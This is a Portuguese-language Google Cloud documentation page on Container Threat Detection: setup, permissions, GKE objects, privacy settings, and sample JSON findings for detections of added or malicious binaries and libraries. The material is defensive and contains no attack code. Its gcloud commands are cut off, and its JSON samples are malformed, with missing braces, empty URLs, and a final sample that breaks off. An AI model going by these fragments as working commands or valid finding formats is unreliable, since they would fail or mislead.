Usar o Container Threat Detection

Nesta página, mostramos como analisar as descobertas do Container Threat Detection no console do Google Cloud e inclui exemplos de descobertas do Container Threat Detection.

O Container Threat Detection é um serviço integrado das redes Premium e Enterprise níveis do Security Command Center.

Para acessar as descobertas do Container Threat Detection, o serviço precisa estar ativado em Serviços do Security Command Center configurações.

Saiba mais sobre como visualizar e gerenciar descobertas do Container Threat Detection em Como analisar os resultados nesta página.

Para ativar o Container Threat Detection e outros detectores de nível Premium no nível do projeto, consulte Ativar o Security Command Center para um projeto. O nível Enterprise não oferece suporte a ativações para envolvidos no projeto.

Como usar uma versão compatível do GKE

Para detectar possíveis ameaças aos contêineres, verifique se os clusters estão em uma versão compatível do Google Kubernetes Engine (GKE). No momento, o Container Threat Detection é compatível com as seguintes versões do GKE nos canais regulares, estáveis e rápidos:

  • GKE Standard >= 1.15.9-gke.12
  • GKE Standard >= 1.16.5-gke.2
  • GKE Standard >= 1.17
  • GKE Standard >= 1.18.10-gke.1400
  • GKE Standard >= 1.19.2-gke.2000
  • GKE Standard >= 1.20
  • GKE Standard >= 1.21
  • GKE Autopilot >= 1.21.11-gke.900
  • GKE Standard e Autopilot >= 1.22
  • GKE Standard e Autopilot >= 1.23

O Container Threat Detection é compatível apenas com imagens de nó do Container-Optimized OS.

Como ativar o Container Threat Detection

Quando você ativa o nível Premium ou Enterprise do Security Command Center, A detecção de ameaças a contêineres é ativada por padrão, a menos que você opte por desativá-la durante a processo de ativação.

Se você precisar ativar ou desativar o Container Threat Detection para sua organização ou projeto, faça isso na página Configurações do Security Command Center. Para mais informações, consulte Ativar ou desativar um serviço integrado.

Ao ativar o Container Threat Detection, seja com a ativação do Security Command Center ou mais tarde, realize estas ações:

  1. Para os clusters que não estiverem em uma versão compatível do GKE, conclua as etapas no guia para fazer upgrade de um cluster.
  2. Verifique se os clusters têm recursos suficientes disponíveis para executar o DaemonSet do Container Threat Detection.
  3. No console do Google Cloud, consulte Configurações de ativação do serviço Container Threat Detection para garantir que o Container Threat Detection seja ativado nos clusters.

Permissões do IAM obrigatórias

O Container Threat Detection precisa de permissão para ser ativado e desativado por conta própria e gerenciar o agente do Container Threat Detection no GKE clusters.

Para conceder a permissão necessária, o papel do IAM Agente de serviço do Container Threat Detection (roles/containerthreatdetection.serviceAgent) precisa ser concedida para o agente de serviço Container Threat Detection, que é um tipo de conta de serviço.

A remoção desse papel padrão do agente de serviço pode interromper que a detecção de ameaças de contêiner funcione corretamente.

Dependendo de como e quando o Security Command Center foi ativado, o nome o agente de serviço usado pelo Container Threat Detection é diferente:

  • Se o Security Command Center foi ativado antes de 7 de dezembro de 2023, O Container Threat Detection usa o seguinte agente de serviço gerenciado pelo usuário:

  • Se o Security Command Center foi ativado no nível da organização desde 7 de dezembro de 2023, o Container Threat Detection usa a seguinte agente de serviço no nível da organização gerenciado pelo usuário:

  • Se o Security Command Center foi ativado no nível do projeto desde 7 de dezembro de 2023, o Container Threat Detection usa a seguinte agente de serviço no nível da organização gerenciado pelo usuário:

Para mais informações sobre agentes de serviço e papéis do IAM, consulte o seguinte:

Como verificar a configuração do cluster do GKE

Para que o Container Threat Detection funcione, se o cluster estiver em uma nuvem privada virtual (VPC, na sigla em inglês), a rede dele precisará atender aos requisitos de roteamento, firewall e DNS para se comunicar com as APIs e serviços do Google. Para acessar as APIs do Google, consulte os seguintes guias:

Além disso, a configuração do cluster do GKE ou as restrições da política da organização não podem bloquear a criação ou o uso de objetos que o Container Threat Detection precisa para funcionar. Nas seções a seguir, incluímos uma lista de objetos do GKE que o Container Threat Detection cria e explicamos como configurar componentes essenciais do GKE para funcionar com o Container Threat Detection.

Objetos do Kubernetes

Após a integração, o Container Threat Detection cria vários objetos do GKE nos clusters ativados. Os objetos são usados para monitorar imagens de contêiner, gerenciar contêineres e pods com privilégios e avaliar o estado para gerar descobertas. A tabela a seguir lista os objetos, suas propriedades e funções essenciais.

Objeto Nome1 Propriedades Função
ClusterRole container-watcher-pod-reader Concede permissões get, watch e list nos pods
ClusterRole pod-reader Concede permissões get, watch e list nos pods



Concede os papéis container-watcher-pod-reader e gce:podsecuritypolicy:privileged a container-watcher-pod-reader
CustomResourceDefinition Relatórios de status do DaemonSet
DaemonSet container-watcher2 Privilegiado Interações com o Linux Security Module e o mecanismo do contêiner
Ativa /host/ como leitura e gravação Comunicação com o módulo de segurança do Linux
Ativa /etc/container-watcher/secrets como somente leitura para acessar container-watcher-token Authentication
Usa hostNetwork Geração de descobertas
Ativação e upgrade
Back-end de
Geração de descobertas
Papel container-watcher-status-reporter Papel com verbos get, list, watch, create, update, patch para a CustomResourceDefinition de Permite atualizar as informações de status do DaemonSet
RoleBinding gce:podsecuritypolicy:container-watcher Concede o papel gce:podsecuritypolicy:privileged à ServiceService da container-watcher-pod-reader Preserva a funcionalidade quando o PodSecurityPolicy está ativado
container-watcher-status-reporter Concede o papel container-watcher-status-reporter à ServiceService da container-watcher-pod-reader
Secret container-watcher-token Authentication
ServiceAccount container-watcher-pod-reader Ativação, upgrade e desativação

1 * Todos os objetos estão no namespace kube-system, exceto container-watcher-pod-reader e gce:podsecuritypolicy:container-watcher.

2 Durante a instalação, atualização ou remoção do Container Threat Detection, o Kubernetes pode emitir mensagens de erro para objetos do Kubernetes ou outras dependências que estão temporariamente ausentes ou incompletas. Os erros são resolvidos automaticamente quando o Container Threat Detection conclui a ação. A menos que os erros persistam após alguns minutos, ignore-os.

Controladores de PodSecurityPolicy e Admission

O PodSecurityPolicy é um recurso controlador de admissão criado para validar solicitações de criação e atualização de pods no cluster. O Container Threat Detection é compatível com PodSecurityPolicies, que são aplicados automaticamente ao criar ou atualizar um cluster com a sinalização enable-pod-security-policy. Especificamente, o Container Threat Detection usa a política gce.privileged quando o PodSecurityPolicy está ativado.

Se você usar PodSecurityPolicies personalizado ou outros controladores de admissão, eles não precisarão bloquear a criação ou o uso de objetos que o Container Threat Detection precisa funcionar. Por exemplo, um controlador de admissão baseado em webhook que rejeita ou modifica implantações privilegiadas pode impedir o funcionamento correto do Container Threat Detection.

Para mais informações, consulteComo usar PodSecurityPolicies.

Como excluir variáveis de ambiente das descobertas do Container Threat Detection

Por padrão, quando o Container Threat Detection gera uma descoberta, ele informa variáveis de ambiente para todos os processos mencionados na descoberta. Os valores das variáveis de ambiente podem ser importantes ao investigar um ataque. No entanto, alguns pacotes de software armazenam secrets e outras informações confidenciais em variáveis de ambiente. Para impedir que o Container Threat Detection inclua variáveis de ambiente de processo em qualquer descoberta do Container Threat Detection, desative o campoREPORT_ENVIRONMENT_VARIABLES usandoCLI do Google Cloud ou API Security Command Center ContainerThreatDetectionSettings no nível da organização, da pasta ou do projeto.

Por exemplo, para desativar o relatório de variáveis de ambiente em um projeto, execute o seguinte comando:

gcloud alpha scc settings services modules disable \

Para restaurar o comportamento padrão, ative o relatório de variáveis de ambiente executando:

gcloud alpha scc settings services modules enable \

Para ver todos os comandos gcloud alpha scc para módulos, consulte gcloud alpha scc settings services modules.

Como excluir argumentos da CLI de descobertas do Container Threat Detection

Todos os processos têm um ou mais argumentos de linha de comando (CLI). Por padrão, quando o Container Threat Detection inclui detalhes do processo em uma descoberta, ele registra os argumentos da CLI relacionados. Os valores dos argumentos da CLI podem ser importantes ao investigar um ataque. No entanto, alguns usuários podem transmitir secrets e outras informações sensíveis nos argumentos da CLI. Para impedir que o Container Threat Detection inclua argumentos da CLI do processo em qualquer descoberta que fizer, desative o módulo REPORT_CLI_ARGUMENTS usando a CLI do Google Cloud ou a API Security Command Center ContainerThreatDetectionSettings no nível da organização, da pasta ou do projeto.

Por exemplo, para desativar o relatório de argumentos da CLI em um projeto, execute o seguinte comando:

gcloud alpha scc settings services modules disable \

Para restaurar o comportamento padrão, ative a geração de relatórios de argumentos da CLI executando o seguinte:

gcloud alpha scc settings services modules enable \

Para ver todos os comandos gcloud alpha scc para módulos, consulte gcloud alpha scc settings services modules.

Uso de recursos

O Container Threat Detection foi projetado para ter um impacto insignificante no desempenho nos seus clusters, e não pode afetar as operações do cluster.

O uso de recursos depende da carga de trabalho. No entanto, os principais componentes do Container Threat Detection, o DaemonSet do espaço do usuário e o Linux Security Module (LSM), têm o seguinte impacto estimado no desempenho:

  • DaemonSet: no máximo 0,125 vCPU e 300 MB de memória, com base em limites absolutos definidos para restringir o uso de recursos. Às vezes, os limites são reavaliados e podem ser alterados para otimizar o desempenho, especialmente para nós muito grandes.
  • LSM: varia com base nas características da carga de trabalho, mas, em casos que exigem o LSM, observamos menos de 2% da CPU e 1% da memória. É possível testar o impacto do desempenho instrumentando as cargas de trabalho com e sem a detecção de ameaças do contêiner ativada.

Se você é um cliente do BigQuery, é possível ativar a medição de uso do GKE para monitorar o uso de recursos do DaemonSet do espaço do usuário do Container Threat Detection. Para visualizar o DaemonSet do espaço do usuário na medição de uso, pesquise o namespace kube-system e o rótulo k8s-app=container-watcher.

A medição de uso do GKE não pode rastrear o uso da CPU do kernel especificamente para o LSM. Esses dados estão incluídos no uso geral da CPU.

API Container Threat Detection

O Container Threat Detection ativa automaticamente a API containerthreatdetection durante a integração para permitir a geração de descobertas. Não interaja diretamente com essa API obrigatória. A desativação dessa API prejudicaria a capacidade da Container Threat Detection para gerar novas descobertas. Se você quiser parar de receber as descobertas da detecção de ameaças do contêiner, desative as configurações de Serviços do Security Command Center.

Como revisar descobertas

Quando o Container Threat Detection gera descobertas, é possível vê-las no Security Command Center. Se você configurou exportações de registros para o Cloud Logging, será possível também conferir as descobertas no Cloud Logging. Para gerar uma descoberta e verificar a configuração, você pode acionar intencionalmente um detector e testar o Container Threat Detection.

O Container Threat Detection tem as seguintes latências:

  • Latência de ativação de 3,5 horas para organizações ou projetos recém-integrados.
  • Latência de ativação de minutos para clusters recém-criados.
  • Latência de detecção de minutos para ameaças em clusters que foram ativados.

Analisar descobertas no console do Google Cloud

Os papéis do IAM para o Security Command Center podem ser concedidos no nível da organização, da pasta ou do projeto. A capacidade de ver, editar, criar ou atualizar descobertas, recursos e fontes de segurança depende do nível a que você tem acesso. Para saber mais sobre os papéis do Security Command Center, consulte Controle de acesso.

Para analisar as descobertas do Container Threat Detection no Security Command Center, siga estas etapas:

  1. Acesse a página Descobertas do Security Command Center no Console do Google Cloud.

    Acesse Descobertas

  2. Se necessário, selecione o projeto ou a organização do Google Cloud.

    Seletor de projetos

  3. Na seção Filtros rápidos, na subseção Nome de exibição da origem, selecione Container Threat Detection.

  4. Para ver detalhes sobre uma descoberta específica, clique no nome da descoberta em Category. O painel de detalhes da descoberta é expandido para exibir informações sobre a descoberta, organizadas em algumas ou todas as seguintes seções:

    • O que foi detectado: informações sobre o problema de segurança detectado, incluindo um resumo gerado por IAVisualização do problema.
    • Recurso afetado: informações sobre o recurso em que o problema foi detectado.
    • Marcações de segurança: todas as marcações de segurança que sua equipe adicionou à descoberta.
    • Próximas etapas: as etapas para resolver o problema.
    • Links relacionados: links para padrões relevantes, descobertas relacionadas, ferramentas de investigação adicionais e assim por diante.
    • Serviço de detecção: informações sobre o serviço Security Command Center, como o Container Threat Detection, que detectou o problema, além de informações sobre a descoberta em si.
  5. Para conferir a estrutura JSON completa da descoberta, clique na guia JSON.

Para uma lista de descobertas do Container Threat Detection, consulte Detectores de ameaças do contêiner.

Como visualizar descobertas no Cloud Logging

Para visualizar as descobertas do Container Threat Detection no Cloud Logging:

  1. Acesse a página "Explorador de registros" do Cloud Logging no console do Google Cloud.

    Acessar o Explorador de registros

  2. No Seletor de projetos, na parte superior da página, selecione o projeto em que você está armazenando os registros do Container Threat Detection.

  3. Clique na guia Criador de consultas.

  4. Na lista suspensa de Recursos, selecione Threat Detector.

    • Para ver as descobertas de todos os detectores, selecione all detector_name.
    • Para visualizar as descobertas de um detector específico, selecione o nome dele.
  5. Como alternativa, insira resource.type="threat_detector" na caixa de texto do criador de consultas e clique em Executar consulta.

  6. A tabela será atualizada com os registros selecionados.

  7. Crie consultas de registros avançadas para especificar um conjunto de entradas de registros de qualquer número de registros.

Exemplos de formatos de descoberta

Esta seção inclui os formatos JSON das descobertas do Container Threat Detection.

Estes exemplos contêm os campos mais comuns a todas as descobertas. No entanto, é possível que nem todos os campos apareçam em todas as descobertas. A saída real que você vê depende da configuração de um recurso e do tipo e do estado das descobertas. As informações do Kubernetes e do containerd são fornecidas da melhor maneira possível e não são garantidas.

Para mais informações sobre os campos em cada descoberta, consulte as descrições dos campos em Recurso REST: organizations.sources.findings.

Adição de binário executado

  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//",
    "state": "ACTIVE",
    "category": "Added Binary Executed",
    "sourceProperties": {
      "VM_Instance_Name": "INSTANCE_ID",
      "Added_Binary_Kind": "Added",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Name": "CONTAINER_NAME",
      "Parent_Pid": 1.0,
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Creation_Timestamp": {
        "seconds": 1.617989997E9,
        "nanos": 1.17396995E8
      "Pid": 53.0,
      "Pod_Namespace": "default",
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Process_Arguments": ["BINARY_PATH"],
      "Pod_Name": "POD_NAME",
      "description": "A binary that was not part of the original container image
      was executed. If an added binary is executed by an attacker, this is a
      possible sign that an attacker has control of the workload and they are
      executing arbitrary commands.",
      "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
      test-4af235e12be6f9d9", "HOME\u003d/root",
      "Container_Creation_Timestamp": {
        "seconds": 1.617989918E9,
        "nanos": 0.0
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    "eventTime": "2021-04-09T17:39:57.527Z",
    "createTime": "2021-04-09T17:39:57.625Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            "nanos": {
              "primitiveDataType": "NUMBER"
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
      "Added_Binary_Kind": {
        "primitiveDataType": "STRING"
      "description": {
        "primitiveDataType": "STRING"
      "Pid": {
        "primitiveDataType": "NUMBER"
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      "Pod_Name": {
        "primitiveDataType": "STRING"
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            "nanos": {
              "primitiveDataType": "NUMBER"
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      "Container_Name": {
        "primitiveDataType": "STRING"
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  "resource": {
    "name": "//",
    "projectName": "//",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"

Adição de biblioteca carregada

  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findingsFINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//",
    "state": "ACTIVE",
    "category": "Added Library Loaded",
    "sourceProperties": {
      "Process_Arguments": ["BINARY_PATH", "ADDED_LIBRARY_NAME"],
      "Parent_Pid": 1.0,
      "Container_Name": "CONTAINER_NAME",
      "Added_Library_Fullpath": "ADDED_LIBRARY_PATH",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Creation_Timestamp": {
        "seconds": 1.618004144E9,
        "nanos": 0.0
      "Pod_Name": "POD_NAME",
      "Pid": 7.0,
      "description": "A library that was not part of the original container
      image was loaded. If an added library is loaded, this is a possible sign
      that an attacker has control of the workload and they are executing
      arbitrary code.",
      "VM_Instance_Name": "INSTANCE_ID",
      "Pod_Namespace": "default",
      "Environment_Variables": ["KUBERNETES_SERVICE_PORT\u003d443",
      "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT", "HOSTNAME\u003dsuspicious-
      library", "LD_LIBRARY_PATH\u003d/tmp", "PORT\u003d8080",
      "HOME\u003d/root", "PYTHONUNBUFFERED\u003d1",
      , "KUBERNETES_PORT_443_TCP_PORT\u003d443",
      "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp", "LANG\u003dC.UTF-8",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/home/vmagent/app"],
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Added_Library_Kind": "Added",
      "Container_Image_Uri": "CONTAINER_IMAGE_uri"
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    "eventTime": "2021-04-09T21:36:13.069Z",
    "createTime": "2021-04-09T21:36:13.267Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      "Added_Library_Fullpath": {
        "primitiveDataType": "STRING"
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            "nanos": {
              "primitiveDataType": "NUMBER"
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
      "description": {
        "primitiveDataType": "STRING"
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
      "Pid": {
        "primitiveDataType": "NUMBER"
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      "Pod_Name": {
        "primitiveDataType": "STRING"
      "Added_Library_Kind": {
        "primitiveDataType": "STRING"
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      "Container_Name": {
        "primitiveDataType": "STRING"
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  "resource": {
    "name": "//",
    "projectName": "//",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"

Execução: adição de binário malicioso executado

  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Added Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
    "createTime": "2023-11-13T19:51:22.538Z",
    "database": {},
    "eventTime": "2023-11-13T19:51:22.383Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
      "nodes": [
          "name": "//"
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
        "binary": {
          "path": "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        "args": [
        "argumentsTruncated": false,
        "envVariables": [
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://\""
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-added-test-malicious-binary\""
            "name": "\"HOME\"",
            "val": "\"/root\""
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"\""
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://\""
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"\""
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
        "pid": "7",
        "parentPid": "1"
    "resourceName": "//",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  "resource": {
    "name": "//",
    "display_name": "CLUSTER_ID",
    "project_name": "//",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    "detectionCategory": {
      "ruleName": "added_malicious_binary_executed"
    "detectionPriority": "CRITICAL",
    "affectedResources": [
        "gcpResourceName": "//"
    "evidence": [
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699905066",
            "nanos": 618571329
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": ""
      "virustotalIndicatorQueryUri": [
          "displayName": "VirusTotal IP Link",
          "url": ""
      "cloudLoggingQueryUri": [
          "displayName": "Cloud Logging Query Link",
          "url": ";query=timestamp%3D%222023-11-13T19:51:06.618571329Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
      "relatedFindingUri": {}

Execução: biblioteca maliciosa carregada

  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Added Malicious Library Loaded",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
    "createTime": "2023-11-13T21:40:14.340Z",
    "database": {},
    "eventTime": "2023-11-13T21:40:14.209Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
      "nodes": [
          "name": "//"
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
        "binary": {
          "path": "\"/malicious_files/drop_mal_lib\"",
          "size": "5005064",
          "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
          "hashedSize": "5005064",
          "partiallyHashed": false
        "libraries": [
            "path": "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\"",
            "size": "68",
            "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
            "hashedSize": "68",
            "partiallyHashed": false
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        "args": [
        "argumentsTruncated": false,
        "envVariables": [
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://\""
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-added-malicious-library\""
            "name": "\"HOME\"",
            "val": "\"/root\""
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"\""
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://\""
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"\""
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
        "pid": "8",
        "parentPid": "1"
    "resourceName": "//",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  "resource": {
    "name": "//",
    "display_name": "CLUSTER_ID",
    "project_name": "//",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    "detectionCategory": {
      "ruleName": "added_malicious_library_loaded"
    "detectionPriority": "CRITICAL",
    "affectedResources": [
        "gcpResourceName": "//"
    "evidence": [
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911603",
            "nanos": 535268047
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": ""
      "virustotalIndicatorQueryUri": [
          "displayName": "VirusTotal IP Link",
          "url": ""
      "cloudLoggingQueryUri": [
          "displayName": "Cloud Logging Query Link",
          "url": ";query=timestamp%3D%222023-11-13T21:40:03.535268047Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
      "relatedFindingUri": {}

Execução: criação em binário malicioso executado

  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Built in Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
    "createTime": "2023-11-13T21:38:57.405Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:57.250Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
      "nodes": [
          "name": "//"
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
        "binary": {
          "path": "\"/malicious_files/eicar_testing_file\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        "args": [
        "argumentsTruncated": false,
        "envVariables": [
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://\""
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-built-in-malicious-binary\""
            "name": "\"HOME\"",
            "val": "\"/root\""
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"\""
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
